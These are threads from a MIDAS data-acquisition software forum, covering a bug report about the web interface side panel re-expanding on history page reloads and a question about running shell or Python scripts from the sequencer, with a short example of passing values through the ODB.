    Reply  31 Oct 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> 
> 
> One can collapse the side panel when looking at history pages with the button in
> the top left, great! We want to see many pages so screen real estate is important
> 
> The issue we face is that when the page refreshes, the side panel expands. Can
> we make the panel state more 'sticky'?
> 
> Many thanks
> Joseph (ALPHA)
> 
> Version: 	2.1
> Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
> on branch feature/midas-2017-10

Hi Joseph,

In principle a page refresh should not be necessary any more, since pages automatically reload 
the content that changes. If a custom page needs a reload, it is not well designed. If necessary, I 
can explain the details. 

Anyhow, I implemented your "stickiness" of the side panel in the last commit to the develop branch.

Best regards,
Stefan
       Reply  31 Oct 2018, Joseph McKenna, Bug Report, Side panel auto-expands when history page updates 
> > 
> > 
> > One can collapse the side panel when looking at history pages with the button in
> > the top left, great! We want to see many pages so screen real estate is important
> > 
> > The issue we face is that when the page refreshes, the side panel expands. Can
> > we make the panel state more 'sticky'?
> > 
> > Many thanks
> > Joseph (ALPHA)
> > 
> > Version: 	2.1
> > Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
> > on branch feature/midas-2017-10
> 
> Hi Joseph,
> 
> In principle a page refresh should not be necessary any more, since pages automatically reload 
> the content that changes. If a custom page needs a reload, it is not well designed. If necessary, I 
> can explain the details. 
> 
> Anyhow, I implemented your "stickiness" of the side panel in the last commit to the develop branch.
> 
> Best regards,
> Stefan

Hi Stefan,

I apologise for misusing the word "refresh". The re-appearing sidebar was also seen with the automatic
reload. I have implemented your fix here and it now works great!

Thank you very much!
Joseph
          Reply  02 Nov 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> I apologise for misusing the word "refresh". The re-appearing sidebar was also seen with the automatic
> reload. I have implemented your fix here and it now works great!

I still did not get your point. Why is there an "automatic reload"? The status page should not "completely reload" any more. 
Instead, all data is fetched in the background using AJAX calls, and only the data on the page is updated once per second. If 
there is a "complete reload", something is wrong.

Stefan
             Reply  02 Nov 2018, Thomas Lindner, Bug Report, Side panel auto-expands when history page updates 
> > I apologise for misusing the word "refresh". The re-appearing sidebar was also seen with the automatic
> > reload. I have implemented your fix here and it now works great!
> 
> I still did not get your point. Why is there an "automatic reload"? The status page should not "completely reload" any more. 
> Instead, all data is fetched in the background using AJAX calls, and only the data on the page is updated once per second. If 
> there is a "complete reload", something is wrong.

Joseph's original message says that the problem is with the standard MIDAS history page, which currently uses a complete reload 
when refreshing. Of course we are planning to update the history pages to only grab what they need (as well as changing the 
plotting to use newer HTML plotting). But until that upgrade happens, your fix is helpful for the history page.
                Reply  02 Nov 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> Joseph's original message says that the problem is with the standard MIDAS history page, which currently uses a complete reload 
> when refreshing. Of course we are planning to update the history pages to only grab what they need (as well as changing the 
> plotting to use newer HTML plotting). But until that upgrade happens, your fix is helpful for the history page.

Ok, now I understand, and of course I agree with you.

Stefan
Entry  11 Sep 2018, Francesco Renga, Forum, Launching an executable script from the sequencer 
Dear experts,
              is there any way to launch an executable script on the host computer from the MIDAS 
sequencer? If not, is there any interest in developing such a feature?

Thank you,
         Francesco
    Reply  11 Sep 2018, Pierre Gorel, Forum, Launching an executable script from the sequencer 
> Dear experts,
>               is there any way to launch an executable script on the host computer from the MIDAS 
> sequencer? If not, is there any interest to develop such a feature?
> 
> Thank you,
>          Francesco

The SCRIPT command will do that (on the machine running MIDAS). I know it works with either python or
bash scripts. I tried without success to pass parameters, so I worked around it by setting ODB entries
prior to running the script and then accessing them within the script.
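For the record, the two variants would look roughly like this in a sequencer .msl file (paths and values are made up, and variant 2 assumes the ODB key already exists):

   # variant 1: pass the parameter directly (reported not to work, see above)
   SCRIPT /home/daq/myscript.sh, 42

   # variant 2: the workaround - stage the "parameter" in the ODB first
   ODBSET /Experiment/MyParam, 42
   SCRIPT /home/daq/myscript.sh

and the script reads it back, e.g. with odbedit:

   #!/bin/bash
   PARAM=$(odbedit -c 'ls -v /Experiment/MyParam')
   echo "got $PARAM"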
       Reply  11 Sep 2018, Stefan Ritt, Forum, Launching an executable script from the sequencer 
> > Dear experts,
> >               is there any way to launch an executable script on the host computer from the MIDAS 
> > sequencer? If not, is there any interest to develop such a feature?
> > 
> > Thank you,
> >          Francesco
> 
> The SCRIPT command will do that (on the machine running MIDAS). I know it works with either python or
> bash scripts. I tried without success to pass parameters, so I worked around it by setting ODB entries
> prior to running the script and then accessing them within the script.

Passing parameters should work. If it's confirmed to be broken, I'm willing to fix it.

Stefan